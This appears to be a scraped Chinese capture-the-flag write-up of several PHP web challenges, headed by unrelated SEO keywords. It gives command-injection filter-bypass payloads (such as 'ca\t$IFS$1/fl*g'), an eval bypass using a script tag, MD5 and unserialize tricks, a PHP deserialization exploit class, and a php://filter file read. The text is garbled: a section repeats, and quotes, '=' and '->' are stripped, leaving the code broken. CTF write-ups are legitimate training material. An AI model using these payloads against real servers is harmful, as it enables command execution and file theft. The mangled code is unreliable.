哪里找专业做网站的公司,网站设计制作策划书,电商新手入门知识,wordpress文章调用文章目录 源码#xff01;启动!webshell是啥捏细狗2.0ez_php1Hello,youEZ_eval巴巴托斯#xff01; 源码#xff01;启动!
打开题目#xff0c;发现右键被禁了 直接ctrlu查看源码得到flag
webshell是啥捏
源码
?php
highlight_file(__FILE__);
$#x1f600;启动!webshell是啥捏细狗2.0ez_php1Hello,youEZ_eval巴巴托斯 源码启动!
打开题目发现右键被禁了 直接ctrlu查看源码得到flag
webshell是啥捏
源码
?php
highlight_file(__FILE__);
$a;
$b;
$c;
$d;
$e;
$f;
$g;
$h;
$i;
$j;
$k;
$l;
$m;
$n;
$o;
$p;
$q;
$r;
$s;
$t;
$u;
$v;
$w;
$x;
$y;
$z;$ $. $. $. $. $. $. $. $;if (isset($_GET[])) {eval($($_GET[]));
};?php中变量与变量之间用点号连接表示拼接 题目拼接结果为passthru 那么我们直接ls / 得到flag
细狗2.0
简单的命令执行绕过 payload
?hongzh0;ca\t$IFS$1/fl*g得到flag
ez_php1
源码
?php
highlight_file(__FILE__);
error_reporting(0);
include globals.php;
$a $_GET[b];
$b $_GET[a];
if($a!$bmd5($a)md5($b))
{echo !!!;$c $_POST[FL_AG];if(isset($c)){if (preg_match(/^.*(flag).*$/, $ja)) {echo You are bad guy!!!;}else {echo Congratulation!!;echo $hint1;}}else {echo Please input my love FL_AG;}
} else{die(game over!);
}
? 分析一下就是简单的MD5绕过和php解析特性 得到hint 访问./L0vey0U.php
?php
highlight_file(__FILE__);
error_reporting(0);
include globals.php;
$FAKE_KEY Do you love CTF?;
$KEY YES I love;
$str $_GET[str];
echo $flag;
if (unserialize($str) $KEY)
{echo $hint2;
}
?exp
?php
$str YES I love;
echo serialize($str);得到第二个hint 访问./P0int.php
?php
highlight_file(__FILE__);
error_reporting(0);
class Clazz
{public $a;public $b;public function __wakeup(){$this-a file_get_contents(php://filter/readconvert.base64-encode/resourceg0t_f1ag.php);}public function __destruct(){echo $this-b;}
}
unserialize($_POST[data]);? 非常简单的变量引用 exp如下
?php
class Clazz
{public $a;public $b;
}
$Cnew Clazz();
$C-b$C-a;
echo serialize($C);解码得到flag
Hello,you
简单的命令注入用分号隔断命令
1;ls反斜杠绕过和星号绕过
1;ca\t f*EZ_eval
源码
?phpif(isset($_GET[word])){$word $_GET[word];if (preg_match(/cat|tac|tail|more|head|nl|flag|less| /, $word)){die(nonono.);}$word str_replace(?, , $word);eval(?. $word);
}else{highlight_file(__FILE__);
}简单分析下eval函数中已经闭合前面?那么我们要自己输入php的头?由于问号被过滤了 这里用secript文件上传做的多会很快想到然后就是一些常规过滤用%09代替空格反斜杠绕过关键字检测
?wordscript%09languagephpsystem(ca\t%09/fl\ag);/script得到flag
巴巴托斯
前面按照要求来修改 然后试试目录穿越查看用户信息 想尝试直接读发现有报错且为include函数
直接php伪协议读取 解码得到flag